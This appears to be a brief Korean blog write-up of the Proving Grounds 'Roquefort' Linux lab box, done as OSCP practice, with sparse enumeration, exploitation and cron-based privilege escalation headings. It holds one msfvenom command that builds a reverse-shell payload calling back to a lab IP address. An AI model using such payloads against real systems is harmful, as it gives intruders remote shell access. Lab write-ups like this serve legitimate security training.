OSCP/Proving Ground
27. Roquefort (GET TO WORK) - Linux
takudaddy
2022. 8. 18. 00:52
1. Enumeration
: NMAP

: Web enum

서비스 버전을 확인해 보면
RCE가 가능한 취약점이 있다.
2. Exploitation
쉘을 올리자마자
곧바로 실행되는 것이 아니라
10분 이상 기다려야 한다.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.49.84 LPORT=21 -f elf -o shell


침투 성공
3. Privilege Escalation

cron 설정 확인







끝
728x90